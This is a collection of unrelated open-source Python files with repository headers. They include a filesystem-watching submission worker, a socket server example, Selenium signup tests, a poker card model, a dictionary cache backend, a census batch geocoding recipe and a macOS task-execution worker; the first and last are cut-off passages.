@click.command(help='listens for changes to submission directory and processes them asynchronously')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
@click.option(
'--async/--no-async',
default=True,
help='''process asynchronously''')
def worker(root, async=True): # pragma: no cover
drop_root = DropboxContainer(root=root)
settings = drop_root.settings
# Setup multiprocessing pool with that amount of workers as
# implied by the amount of worker jails
if async:
workers = Pool(processes=settings.get('num_workers', 1))
# Setup the condition object that we will wait for, it
# signals changes in the directory
condition = Condition()
# Setup and run the actual file system event watcher
event_handler = MyHandler(condition)
observer = Observer()
observer.schedule(event_handler, drop_root.fs_submission_queue, recursive=False)
observer.start()
signal(SIGINT, keyboard_interrupt_handler)
# grab lock, scan submission dir for jobs and process them
condition.acquire()
while True:
for drop_id in listdir(drop_root.fs_submission_queue):
print(drop_id)
drop = drop_root.get_dropbox(drop_id)
# Only look at drops that actually are for us
if drop.status_int == 20:
# process drops without attachments synchronously
if async and drop.num_attachments > 0:
workers.map_async(process_drop, [drop])
else:
process_drop(drop)
else:
print('Not processing drop %s with status %d ' % (drop.drop_id, drop.status_int))
# Wait for directory content to change
condition.wait()
condition.release()
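The worker above couples watchdog's callback thread to the main loop through a `threading.Condition`: the handler notifies, the main loop waits. That handshake can be sketched standalone (the `producer` thread here is an illustrative stand-in for the filesystem event handler, not part of the module above):

```python
import threading
import time

condition = threading.Condition()
processed = []


def producer():
    # stands in for MyHandler.on_modified: record an event, then wake the main loop
    time.sleep(0.1)
    with condition:
        processed.append('event')
        condition.notify()


t = threading.Thread(target=producer)
with condition:
    t.start()
    # wait() releases the lock while blocked, so the producer can acquire it
    condition.wait(timeout=5)
t.join()
print(processed)  # -> ['event']
```

Note that `condition.wait()` must be called while holding the lock, and it atomically releases the lock while waiting; that is why the handler's acquire/notify/release sequence cannot deadlock against the waiting main loop.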

# examples/basicServer.py (lwahlmeier/python-litesockets, Unlicense)
from litesockets import SocketExecuter, TcpServer
import time

# This starts a SocketExecuter with a default of 5 threads
SE = SocketExecuter()
# creates a TcpServer listening on localhost port 11882 (socket is not open yet)
server = TcpServer("localhost", 11882)


# This is run once the far side is connected
def newConnection(client):
    print "Got new TCPClient", client
    # need to add the client to the SocketExecuter to be able to do anything with it
    SE.addClient(client)
    client.addWrite("hello\n")
    # if we wanted to check for incoming data we would add a reader to the client
    time.sleep(.01)
    # End the client's connection
    client.end()


# We assign a function with 1 argument that will get a client for the server
server.onNew = newConnection
# This opens the listen socket, but it will not yet accept anything
server.connect()
# The server will now accept clients that connect to its listen socket
SE.addServer(server)
time.sleep(100000)

# mathplotlib/calculate_polygon_area.py (ronistiawan/python-scripts, MIT)
from PIL import Image
import numpy as np
from matplotlib.path import Path
import matplotlib.pyplot as plt
import matplotlib.patches as patches

image = Image.open('samp3.png', 'r')  # read image
image = image.convert('L')  # convert image to greyscale
data = np.asarray(image)  # convert image to numpy array
n_rows = len(data)
n_columns = len(data[0])
point = []


# -------------------------- * Draw Point * -------------------------
def drawCircle(x, y):
    global ax
    circle = patches.Circle((x, y), 2, lw=1, ls='-', fill=True, color='red')
    ax.add_patch(circle)
    plt.draw()
    return ax


# ------------- * Draw Polygon and calculate average of pixel values * ------
def drawPolygon(p):
    global point
    line = patches.Polygon(point, lw=1, ls='-', fill=False, color='red')
    ax.add_line(line)
    plt.draw()
    p = Path(point)
    total = 0
    n = 0
    for i in range(0, n_rows):
        for j in range(0, n_columns):
            if p.contains_point([i, j]):
                total += data[i][j]
                n += 1
    print("Average pixel values in the Polygon = " + str(total / n))


# ----------------------------- * On click event * --------------------------
def onclick(event):
    global xc, yc
    global ax, patches
    global point
    x, y = event.xdata, event.ydata
    # stop listening if the user double clicks
    if event.dblclick:
        drawPolygon(point)
        fig.canvas.mpl_disconnect(cid)
        # print("stopped listening for events")
    else:
        point.append([x, y])
        print('added vertex: (%d, %d)' % (x, y))
        drawCircle(x, y)
        return point


# ---------------------------------------------------------------------------
fig, ax = plt.subplots(1)
ax.imshow(data, cmap='gray')
cid = fig.canvas.mpl_connect('button_press_event', onclick)
print("start listening for mouse clicks ... double click to stop listening")
plt.show()
plt.draw()

# src/reducer/bohm_debug.py (fritzo/pomagma, Apache-2.0)
#!/usr/bin/env python
import os
os.environ['POMAGMA_LOG_LEVEL'] = '3'
from pomagma.compiler.util import temp_memoize  # isort:skip
from pomagma.reducer import bohm  # isort:skip

print('Example 1.')
with temp_memoize():
    bohm.sexpr_simplify('(ABS (ABS (1 0 (1 0))) (ABS (ABS (1 (0 0)))))')

print('Example 2.')
with temp_memoize():
    bohm.sexpr_simplify('(ABS (ABS (0 1 1)) (ABS (ABS (1 (0 0)))))')

# scripts/selenium/test.py (Mlrobinson1993/trustroots, MIT)
#!/usr/bin/env python
from browsers import browsers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
import time
import sys
import re
import signal

print 'Trustroots Selenium tests'

# URL is passed as an argument
if len(sys.argv) > 1:
    test_url = sys.argv[1]
# Default to localhost
else:
    test_url = 'http://localhost:3000/'

print 'Testing URL: ' + test_url


class Main:

    def __init__(self):
        try:
            from config_browserstack import browserstack_url
            no_browserstack = 0
        except ImportError:
            no_browserstack = 1
        no_browserstack = 1  # unconditional override: browserstack is effectively disabled
        for cap in browsers:
            if cap['env'] == 'remote' and no_browserstack:
                if no_browserstack == 1:
                    print 'sorry, no browserstack'
                    no_browserstack = 2  # Should be cleaner
            else:
                if cap['env'] == 'local':
                    driver = getattr(webdriver, cap['browser'])()
                else:
                    print 'launching', cap
                    driver = webdriver.Remote(
                        command_executor=browserstack_url,
                        desired_capabilities=cap
                    )
                try:
                    self.t = TestSuite(driver, cap, test_url)
                except:
                    print sys.exc_info()
                finally:
                    if cap['env'] == 'remote':
                        driver.quit()


class TestSuite:

    def __init__(self, driver, cap, url):
        self.wait = WebDriverWait(driver, 15)
        self.driver = driver
        self.cap = cap
        self.url = url

        def signal_handler(signal, frame):
            print('Handling Ctrl+C!')
            if hasattr(self, 'driver') and self.driver:
                print 'Trying driver.quit()'
                self.driver.quit()
            sys.exit(0)
        signal.signal(signal.SIGINT, signal_handler)

        try:
            self.run_tests()
        except:
            print cap
            print sys.exc_info()

    def run_tests(self):
        self.username = 'tester' + str(time.time())[5:10]
        self.email = self.username + '@example.tld'
        self.password = 'Tester123'
        self.driver.get(self.url)
        self.test_signup()
        self.test_home_map()
        self.test_logout_signin()
        self.test_logout_signin_email()

    def test_signup(self):
        if "Trustroots" not in self.driver.title:
            raise Exception("Unable to load page!")
        self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-signup')
        if 'Trustroots' not in self.driver.title:
            raise Exception("Unable to load page!")
        self._wait_and_click(self.driver.find_element_by_id, 'firstName')
        self.driver.find_element_by_id('firstName').send_keys('Tester')
        self.driver.find_element_by_id('lastName').send_keys('Tester')
        self.driver.find_element_by_id('username').send_keys(self.username)
        self.driver.find_element_by_id('email').send_keys(self.email)
        self.driver.find_element_by_id('password').send_keys(self.password)
        self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
        self._wait_and_click(self.driver.find_element_by_id, 'signup-edit')

    def test_logout_signin(self):
        self.driver.get(self.url + 'auth/signout')
        self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
        self.driver.find_element_by_id('username').send_keys(self.username)
        self.driver.find_element_by_id('password').send_keys(self.password)
        self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')

    def test_logout_signin_email(self):
        self.driver.get(self.url + 'auth/signout')
        self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
        self.driver.find_element_by_id('username').send_keys(self.email)
        self.driver.find_element_by_id('password').send_keys(self.password)
        self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')

    def test_home_map(self):
        self._wait_and_click(self.driver.find_element_by_css_selector, 'a.navbar-brand')
        self.driver.find_element_by_id('search-query').send_keys('Berlin' + Keys.RETURN)

    def _assert_contains_regexp(self, regexp):
        text_found = re.search(regexp, self.driver.page_source)
        print text_found
        assert text_found is not None

    def _wait_and_click_id(self, _id, pause=0):
        self._wait_and_click(self.driver.find_element_by_id, _id, pause)

    def _wait_and_click(self, func, param, pause=0):
        if pause == 0:
            self.wait.until(lambda _: func(param).is_displayed())
        else:
            self._sleep(pause)
        func(param).click()


m = Main()

# main.py (Knysliux001/pocker, MIT)
# import random
#
# deck = list()
# for suit in ["♦", "♥", "♠", "♣"]:
#     for value in ["A", "K", "Q", "J", "10", "9", "8", "7", "6", "5", "4", "3", "2"]:
#         deck.append((value, suit))
# r_sample = random.sample(deck, 7)
# print(r_sample)

from enum import Enum, auto, unique


class Suit(Enum):
    HEARTS = "♥"
    DIAMONDS = "♦"
    CLUBS = "♣"
    SPADES = "♠"


class CardRank(Enum):
    TWO = auto()
    THREE = auto()
    FOUR = auto()
    FIVE = auto()
    SIX = auto()
    SEVEN = auto()
    EIGHT = auto()
    NINE = auto()
    TEN = auto()
    JACK = auto()
    QUEEN = auto()
    KING = auto()
    AXE = auto()


class HandRank(Enum):
    HIGHEST_CARD = auto()
    PAIR = auto()
    TWO_PAIRS = auto()
    THREE = auto()
    STRAIGHT = auto()
    FLUSH = auto()
    FULL_HOUSE = auto()
    FOUR = auto()
    STRAIGHT_FLUSH = auto()
    ROYAL_FLUSH = auto()


class Card():

    def __init__(self, value, suit):
        self.__value = value
        self.__suit = suit

    def getValue(self):
        return self.__value

    def __str__(self):
        return '%s%s' % (self.__value.name, self.__suit.value)

    def __repr__(self):
        return self.__str__()

    def __eq__(self, card2):
        return self.__value.value == card2.getValue().value

    def __lt__(self, card2):
        return self.__value.value < card2.getValue().value


class Player(Card):

    def __init__(self, name):
        self.__name = name
        self.__hand = []

    def getName(self):
        return self.__name

    def receiveCard(self, new_card):
        if isinstance(new_card, Card):
            self.__hand.append(new_card)

    def showHand(self):
        hand_str = []
        for card in self.__hand:
            hand_str.append(str(card))
        print(hand_str)


card1 = Card(CardRank.FIVE, Suit.SPADES)
card2 = Card(CardRank.SEVEN, Suit.CLUBS)
card3 = Card(CardRank.AXE, Suit.CLUBS)
card4 = Card(CardRank.FIVE, Suit.SPADES)
card5 = Card(CardRank.SEVEN, Suit.CLUBS)
card6 = Card(CardRank.AXE, Suit.CLUBS)
card7 = Card(CardRank.AXE, Suit.CLUBS)

l = [card1, card2, card3, card4, card5, card6, card7]
print(l)
print(card1 < card3)
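Because `Card` defines `__eq__` and `__lt__`, a hand is sortable with the built-in `sorted`. A minimal standalone sketch of the same rich-comparison idea (`MiniCard` and its integer `rank` are illustrative stand-ins, not part of the module above):

```python
import functools


@functools.total_ordering
class MiniCard(object):
    """Stand-in for Card: __eq__ and __lt__ let total_ordering derive the rest."""

    def __init__(self, rank):
        self.rank = rank  # numeric rank, e.g. 2..14

    def __eq__(self, other):
        return self.rank == other.rank

    def __lt__(self, other):
        return self.rank < other.rank


hand = [MiniCard(7), MiniCard(2), MiniCard(14)]
print([c.rank for c in sorted(hand)])  # -> [2, 7, 14]
```

`functools.total_ordering` fills in `__le__`, `__gt__` and `__ge__` from the two methods given, which the hand-ranking logic can rely on without defining all six comparisons by hand.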

# fclib/tests/test_dcnn.py (barrosm/forecasting, MIT)
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.

from fclib.models.dilated_cnn import create_dcnn_model


def test_create_dcnn_model():
    mod0 = create_dcnn_model(seq_len=1)  # default args
    assert mod0 is not None

    mod1 = create_dcnn_model(
        seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=1, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
    )
    assert mod1 is not None

    mod2 = create_dcnn_model(
        seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=2, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
    )
    assert mod2 is not None

# oslo_cache/backends/dictionary.py (mail2nsrajesh/oslo.cache, Apache-2.0)
# Copyright 2015 Mirantis Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""dogpile.cache backend that uses dictionary for storage"""

from dogpile.cache import api

from oslo_cache import core
from oslo_utils import timeutils

__all__ = [
    'DictCacheBackend'
]

_NO_VALUE = core.NO_VALUE


class DictCacheBackend(api.CacheBackend):
    """A DictCacheBackend based on dictionary.

    Arguments accepted in the arguments dictionary:

    :param expiration_time: interval in seconds to indicate maximum
        time-to-live value for each key in DictCacheBackend.
        Default expiration_time value is 0, that means that all keys have
        infinite time-to-live value.
    :type expiration_time: real
    """

    def __init__(self, arguments):
        self.expiration_time = arguments.get('expiration_time', 0)
        self.cache = {}

    def get(self, key):
        """Retrieves the value for a key.

        :param key: dictionary key
        :returns: value for a key or :data:`oslo_cache.core.NO_VALUE`
            for nonexistent or expired keys.
        """
        (value, timeout) = self.cache.get(key, (_NO_VALUE, 0))
        if self.expiration_time > 0 and timeutils.utcnow_ts() >= timeout:
            self.cache.pop(key, None)
            return _NO_VALUE
        return value

    def get_multi(self, keys):
        """Retrieves the value for a list of keys."""
        return [self.get(key) for key in keys]

    def set(self, key, value):
        """Sets the value for a key.

        Expunges expired keys during each set.

        :param key: dictionary key
        :param value: value associated with the key
        """
        self.set_multi({key: value})

    def set_multi(self, mapping):
        """Set multiple values in the cache.

        Expunges expired keys during each set.

        :param mapping: dictionary with key/value pairs
        """
        self._clear()
        timeout = 0
        if self.expiration_time > 0:
            timeout = timeutils.utcnow_ts() + self.expiration_time
        for key, value in mapping.items():
            self.cache[key] = (value, timeout)

    def delete(self, key):
        """Deletes the value associated with the key if it exists.

        :param key: dictionary key
        """
        self.cache.pop(key, None)

    def delete_multi(self, keys):
        """Deletes the value associated with each key in list if it exists.

        :param keys: list of dictionary keys
        """
        for key in keys:
            self.cache.pop(key, None)

    def _clear(self):
        """Expunges expired keys."""
        now = timeutils.utcnow_ts()
        for k in list(self.cache):
            (_value, timeout) = self.cache[k]
            if timeout > 0 and now >= timeout:
                del self.cache[k]
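The `(value, timeout)` tuple scheme used by `DictCacheBackend` can be exercised in isolation. The sketch below swaps `timeutils.utcnow_ts()` for `time.time()` and uses a plain sentinel object in place of dogpile's `api.NO_VALUE`; both substitutions are assumptions made only to keep the example dependency-free:

```python
import time

NO_VALUE = object()  # stand-in sentinel; the real backend uses dogpile's api.NO_VALUE


class TinyDictCache(object):
    """Dependency-free mirror of DictCacheBackend's (value, timeout) scheme."""

    def __init__(self, expiration_time=0):
        self.expiration_time = expiration_time
        self.cache = {}

    def set(self, key, value):
        timeout = 0
        if self.expiration_time > 0:
            timeout = int(time.time()) + self.expiration_time
        self.cache[key] = (value, timeout)

    def get(self, key):
        value, timeout = self.cache.get(key, (NO_VALUE, 0))
        # expired (or never stored): drop the entry and report a miss
        if self.expiration_time > 0 and int(time.time()) >= timeout:
            self.cache.pop(key, None)
            return NO_VALUE
        return value


cache = TinyDictCache(expiration_time=60)
cache.set('k', 'v')
print(cache.get('k'))  # -> v
print(cache.get('missing') is NO_VALUE)  # -> True
```

A sentinel object (rather than `None`) is what lets the backend distinguish "key absent or expired" from "key present with value `None`", which is exactly why dogpile defines `NO_VALUE`.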

# census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py (RedaAffane/dataiku-contrib, Apache-2.0)
# -*- coding: utf-8 -*-
import dataiku
import pandas as pd, numpy as np
from dataiku import pandasutils as pdu
import requests
# import time
from dataiku.customrecipe import *
import sys
import re
import logging
import geocoder_utils
import common
import os

logging.info('1/6 Creating base folder...')
path_datadir_tmp = dataiku.get_custom_variables()["dip.home"] + '/tmp/'
P_CENSUS_CONTENT = 'geocoder'
FOLDER_NAME = 'tmp_census_us_' + P_CENSUS_CONTENT
common.create_folder(path_datadir_tmp, FOLDER_NAME, True)

input_name = get_input_names_for_role('input')[0]
output_ = get_output_names_for_role('output')[0]
output_dataset = dataiku.Dataset(output_)

P_COL_STREET = get_recipe_config()['p_col_street']
P_COL_CITY = get_recipe_config()['p_col_city']
P_COL_STATE = get_recipe_config()['p_col_state']
P_COL_ZIPCODE = get_recipe_config()['p_col_zipcode']
P_BENCHMARK = get_recipe_config()['p_benchmark']
P_VINTAGE = get_recipe_config()['p_vintage']
if P_BENCHMARK == "9":
    P_VINTAGE = "910"

logging.info('2/6 Parameters:')
logging.info('[+] BENCHMARK = {} ; VINTAGE = {}'.format(P_BENCHMARK, P_VINTAGE))

P_BATCH_SIZE_UNIT = get_recipe_config().get('param_batch_size')
if P_BATCH_SIZE_UNIT is None:
    P_BATCH_SIZE_UNIT = 5000
else:
    P_BATCH_SIZE_UNIT = int(P_BATCH_SIZE_UNIT)

id_column = get_recipe_config()['p_col_id_column']
id_as_int = get_recipe_config()['param_id_as_int']
P_KEEP_NON_MATCHING = get_recipe_config()['param_keep_non_matching']
# P_RETRY_TIE = True  # get_recipe_config()['param_retry_tie']  ### Potential optimization by resubmitting the ties.

in_cols = [id_column, P_COL_STREET, P_COL_CITY, P_COL_STATE, P_COL_ZIPCODE]

if id_as_int:
    id_type = 'int'
else:
    id_type = 'string'

logging.info('3/6 Input columns:')
logging.info(in_cols)

schema = [{'name': id_column, 'type': id_type}
          , {'name': 'street', 'type': 'string'}
          , {'name': 'city', 'type': 'string'}
          , {'name': 'state', 'type': 'string'}
          , {'name': 'zipcode', 'type': 'string'}
          , {'name': 'match', 'type': 'string'}
          , {'name': 'match_quality', 'type': 'string'}
          , {'name': 'matched_address', 'type': 'string'}
          , {'name': 'matched_state', 'type': 'string'}
          , {'name': 'matched_city', 'type': 'string'}
          , {'name': 'matched_zipcode', 'type': 'string'}
          , {'name': 'matched_longitude', 'type': 'string'}
          , {'name': 'matched_latitude', 'type': 'string'}
          , {'name': 'matched_tigerLineId', 'type': 'string'}
          , {'name': 'matched_side', 'type': 'string'}
          , {'name': 'matched_state_id', 'type': 'string'}
          , {'name': 'matched_county_id', 'type': 'string'}
          , {'name': 'matched_tract_id', 'type': 'string'}
          , {'name': 'matched_block_id', 'type': 'string'}
          , {'name': 'tract_id', 'type': 'string'}
          , {'name': 'block_group_id', 'type': 'string'}
          , {'name': 'block_id', 'type': 'string'}]

out_cols = [x['name'] for x in schema]

logging.info('4/6 Writing schema...')
output_dataset.write_schema(schema)

logging.info('5/6 Starting Batch...:')
batch_list_ok = []
b = -1
with output_dataset.get_writer() as writer:
    for df in dataiku.Dataset(input_name).iter_dataframes(chunksize=P_BATCH_SIZE_UNIT, columns=in_cols):
        b = b + 1
        logging.info('Processing batch: %s' % (b))
        df = df[df[P_COL_STREET] != '']
        file_full_path = path_datadir_tmp + '/' + FOLDER_NAME + '/' + 'census_geocode_adresses_' + str(b) + '.csv'
        df.to_csv(file_full_path, sep=',', index=None, header=None)
        url = 'https://geocoding.geo.census.gov/geocoder/geographies/addressbatch?form'
        payload = {'benchmark': P_BENCHMARK, 'vintage': P_VINTAGE, 'layers': 14}
        files = {'addressFile': (file_full_path, open(file_full_path, 'rb'), 'text/csv')}
        try:
            batch = requests.post(url, files=files, data=payload)
            if batch.status_code == 200:
                results = str(batch.text)
                results = re.sub('"', '', results)
                results = results.split('\n')
                for i, result in enumerate(results[:-1]):
                    res_parsed = results[i].split(',')
                    try:
                        idx = res_parsed.index('Match')
                        if idx == 6:
                            res_parsed[1] = res_parsed[1] + res_parsed[2]
                            del res_parsed[2]
                            d = geocoder_utils.batch_geo_parse_regulars(res_parsed, out_cols)
                        elif idx == 4:
                            ok4 = res_parsed[4] == 'Match'
                            res_parsed.insert(3, '-')
                            d = geocoder_utils.batch_geo_parse_regulars(res_parsed, out_cols)
                        elif idx == 5:
                            d = geocoder_utils.batch_geo_parse_regulars(res_parsed, out_cols)
                        else:
                            d = {}
                            d[id_column] = res_parsed[0]
                            for k in out_cols[1:]:
                                d[k] = ''
                            d['match'] = 'Matched parsing required'
                            d['match_quality'] = res_parsed
                        writer.write_row_dict(d)
                    except:
                        # no 'Match' token in this record: a non-matching address
                        if P_KEEP_NON_MATCHING is True:
                            if len(res_parsed) == 6:
                                d = pd.DataFrame([res_parsed], columns=out_cols[:6]).to_dict('record')[0]
                            elif len(res_parsed) == 7:
                                res_parsed[1] = res_parsed[1] + res_parsed[2]
                                del res_parsed[2]
                                d = pd.DataFrame([res_parsed], columns=out_cols[:6]).to_dict('record')[0]
                            else:
                                d = {}
                                d[id_column] = res_parsed[0]
                                for k in out_cols[1:]:
                                    d[k] = ''
                                d['match'] = 'Custom parsing required'
                                d['match_quality'] = res_parsed
                            writer.write_row_dict(d)
            else:
                logging.info("[Warning] : API returns this status: {}".format(batch.status_code))
        # except MaxRetryError as maxerror:
        #     print("Max Retries Error:", maxerror)
        except requests.exceptions.HTTPError as Herr:
            logging.info("Http Error: %s", Herr)
        except requests.exceptions.ConnectionError as errc:
            logging.info("Error Connecting: %s", errc)
        except requests.exceptions.Timeout as errt:
            logging.info("Timeout Error: %s", errt)
        except requests.exceptions.RequestException as err:
            logging.info("Something Else: %s", err)
        batch_list_ok.append(b)

## DEL ALL
logging.info('6/6 Dropping intermediate files...:')
cmd = "rm -rf %s" % (path_datadir_tmp + '/' + FOLDER_NAME)
os.system(cmd)

# workers/macos/worker.py (joweeba/mrtaskman, Apache-2.0)
#!/usr/bin/python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MrTaskman worker script which executes MacOS commands."""
__author__ = 'jeff.carollo@gmail.com (Jeff Carollo)'
import cStringIO
import datetime
import httplib
import json
import logging
import os
import socket
import StringIO
import subprocess
import sys
import time
import urllib2
import gflags
from client import mrtaskman_api
from client import package_installer
from client import package_cache
from common import device_info
from common import http_file_upload
from common import parsetime
from common import split_stream
FLAGS = gflags.FLAGS
gflags.DEFINE_string('log_filename', '', 'Where to log stuff. Required.')
gflags.DEFINE_string('worker_name', '', 'Unique worker name.')
gflags.DEFINE_list('worker_capabilities', ['macos', 'android'],
'Things this worker can do.')
# Package cache flags.
gflags.DEFINE_boolean('use_cache', True, 'Whether or not to use package cache.')
gflags.DEFINE_string('cache_path',
'/usr/local/worker_cache',
'Where to cache packages.')
gflags.DEFINE_integer('min_duration_seconds', 60,
'Minimum time to cache something.')
gflags.DEFINE_integer('max_cache_size_bytes', 2 * 1024 * 1024 * 1024,
'Maximum size of the cache in bytes.')
gflags.DEFINE_float('low_watermark_percentage', 0.6,
'When cleaning up, keeps at least this much cache.')
gflags.DEFINE_float('high_watermark_percentage', 0.8,
'When cleaning up, deletes to below this line.')
class TaskError(Exception):
pass
class MrTaskmanUnrecoverableHttpError(TaskError):
pass
class MrTaskmanRecoverableHttpError(TaskError):
pass
def GetHostname():
return socket.gethostname()


class MacOsWorker(object):
  """Executes macos tasks."""

  def __init__(self, worker_name, log_stream):
    self.worker_name_ = worker_name
    self.log_stream_ = log_stream
    self.api_ = mrtaskman_api.MrTaskmanApi()
    self.hostname_ = GetHostname()
    self.capabilities_ = {'executor': self.GetCapabilities()}
    self.executors_ = {}
    for capability in self.capabilities_['executor']:
      self.executors_[capability] = self.ExecuteTask
    self.use_cache_ = FLAGS.use_cache
    if self.use_cache_:
      self.package_cache_ = package_cache.PackageCache(
          FLAGS.min_duration_seconds,
          FLAGS.max_cache_size_bytes,
          FLAGS.cache_path,
          FLAGS.low_watermark_percentage,
          FLAGS.high_watermark_percentage)

  def GetCapabilities(self):
    capabilities = device_info.GetCapabilities()
    capabilities.append('macos')
    capabilities.append(self.worker_name_)
    return capabilities

  def AssignTask(self):
    """Makes a request to /tasks/assign to get assigned a task.

    Returns:
      Task if a task was assigned, or None.
    """
    try:
      task = self.api_.AssignTask(self.worker_name_, self.hostname_,
                                  self.capabilities_)
      return task
    except urllib2.HTTPError, e:
      logging.info('Got %d HTTP response from MrTaskman on AssignTask.',
                   e.code)
      return None
    except urllib2.URLError, e:
      logging.info('Got URLError trying to reach MrTaskman: %s', e)
      return None

  def SendResponse(self, task_id, stdout, stderr, task_result):
    while True:
      try:
        # TODO(jeff.carollo): Refactor.
        device_sn = device_info.GetDeviceSerialNumber()
        task_result['device_serial_number'] = device_sn

        response_url = self.api_.GetTaskCompleteUrl(task_id)
        if not response_url:
          logging.info('No task complete url for task_id %s', task_id)
          return
        response_url = response_url.get('task_complete_url', None)
        if not response_url:
          logging.info('No task complete url for task_id %s', task_id)
          return

        self.api_.SendTaskResult(response_url, stdout, stderr, task_result)
        logging.info('Successfully sent response for task %s: %s',
                     task_id, self.api_.MakeTaskUrl(task_id))
        return
      except urllib2.HTTPError, error_response:
        body = error_response.read()
        code = error_response.code
        if code == 404:
          logging.warning('TaskCompleteUrl timed out.')
          continue
        logging.warning('SendResponse HTTPError code %d\n%s', code, body)
        return
      except urllib2.URLError, e:
        logging.info(
            'Got URLError trying to send response to MrTaskman: %s', e)
        logging.info('Retrying in 10 seconds')
        time.sleep(10)
        continue

  def GetTaskCompleteUrl(self, task_id):
    try:
      return self.api_.GetTaskCompleteUrl(task_id)
    except urllib2.HTTPError, error_response:
      body = error_response.read()
      code = error_response.code
      logging.warning('GetTaskCompleteUrl HTTPError code %d\n%s', code, body)

  def ShouldWaitForDevice(self):
    """Returns True iff this worker controls a device which is offline."""
    if not device_info.DEVICE_SN:
      return False
    return not device_info.DeviceIsConnected()

  def PollAndExecute(self):
    logging.info('Polling for work...')
    device_active = True
    while True:
      try:
        if self.ShouldWaitForDevice():
          if device_active:
            logging.info('Device %s is offline. Waiting for it to come back.',
                         device_info.DEVICE_SN)
            device_active = False
          time.sleep(10)
          continue
        if not device_active:
          logging.info('Device came back online.')
          device_active = True

        # TODO(jeff.carollo): Wrap this in a catch-all Exception handler that
        # allows us to continue executing in the face of various task errors.
        task = self.AssignTask()
        if not task:
          time.sleep(10)
          continue
      except KeyboardInterrupt:
        logging.info('Caught CTRL+C. Exiting.')
        return

      task_stream = cStringIO.StringIO()
      task_logs = None
      self.log_stream_.AddStream(task_stream)
      try:
        logging.info('Got a task:\n%s\n', json.dumps(task, indent=2))
        config = task['config']
        task_id = int(task['id'])
        attempt = task['attempts']

        # Figure out which of our executors we can use.
        executor = None
        allowed_executors = config['task']['requirements']['executor']
        for allowed_executor in allowed_executors:
          try:
            executor = self.executors_[allowed_executor]
          except KeyError:
            pass
          if executor is not None:
            break

        if executor is None:
          # TODO: Send error response to server.
          # This is probably our fault - we said we could do something
          # that we actually couldn't do.
          logging.error('No matching executor from %s', allowed_executors)
          raise Exception('No allowed executors matched our executors_:\n' +
                          '%s\nvs. %s\n' % (allowed_executors, self.executors_))

        try:
          # We've got a valid executor, so use it.
          (results, stdout, stderr) = executor(task_id, attempt, task, config)
        except MrTaskmanUnrecoverableHttpError:
          logging.error(
              'Unrecoverable MrTaskman HTTP error. Aborting task %d.', task_id)
          continue
      finally:
        self.log_stream_.RemoveStream(task_stream)
        task_logs = task_stream.getvalue().decode('utf-8')
        task_stream.close()

      try:
        results['worker_log'] = task_logs.encode('utf-8')
        self.SendResponse(task_id, stdout, stderr, results)
      except MrTaskmanUnrecoverableHttpError:
        logging.error(
            'Unrecoverable MrTaskman HTTP error. Aborting task %d.', task_id)

      logging.info('Polling for work...')
      # Loop back up and poll for the next task.

  def ExecuteTask(self, task_id, attempt, task, config):
    logging.info('Received task %s', task_id)
    try:
      tmpdir = package_installer.TmpDir()

      # Download the files we need from the server.
      files = config.get('files', [])
      self.DownloadAndStageFiles(files)

      # Install any packages we might need.
      # TODO(jeff.carollo): Handle any exceptions raised here.
      packages = config.get('packages', [])
      self.DownloadAndInstallPackages(packages, tmpdir)

      # We probably don't want to run forever. Default to 12 minutes.
      timeout = config['task'].get('timeout', '12m')
      timeout = parsetime.ParseTimeDelta(timeout)

      # Get any environment variables to inject.
      # Note: dict.update returns None, so update in place rather than
      # assigning the result back to env.
      env = config['task'].get('env', {})
      env.update(os.environ)

      # Get our command and execute it.
      command = config['task']['command']
      logging.info('Running command %s', command)
      (exit_code, stdout, stderr, execution_time, result_metadata) = (
          self.RunCommandRedirectingStdoutAndStderrWithTimeout(
              command, env, timeout, tmpdir.GetTmpDir()))
      logging.info('Executed %s with result %d', command, exit_code)

      results = {
          'kind': 'mrtaskman#task_complete_request',
          'task_id': task_id,
          'attempt': attempt,
          'exit_code': exit_code,
          'execution_time': execution_time.total_seconds(),
          'result_metadata': result_metadata
      }
      return (results, stdout, stderr)
    finally:
      tmpdir.CleanUp()

  def RunCommandRedirectingStdoutAndStderrWithTimeout(
      self, command, env, timeout, cwd):
    command = ' '.join([command, '>stdout', '2>stderr'])

    # TODO: More precise timing through process info.
    begin_time = datetime.datetime.now()
    timeout_time = begin_time + timeout
    process = subprocess.Popen(args=command, env=env, shell=True, cwd=cwd)

    ret = None
    while ret is None and datetime.datetime.now() < timeout_time:
      time.sleep(0.02)
      ret = process.poll()

    finished_time = datetime.datetime.now()
    if finished_time >= timeout_time and ret is None:
      logging.info('command %s timed out.', command)
      process.terminate()
      process.wait()
      ret = -99

    execution_time = finished_time - begin_time

    try:
      stdout = file(os.path.join(cwd, 'stdout'), 'rb')
    except IOError, e:
      logging.error('stdout was not written.')
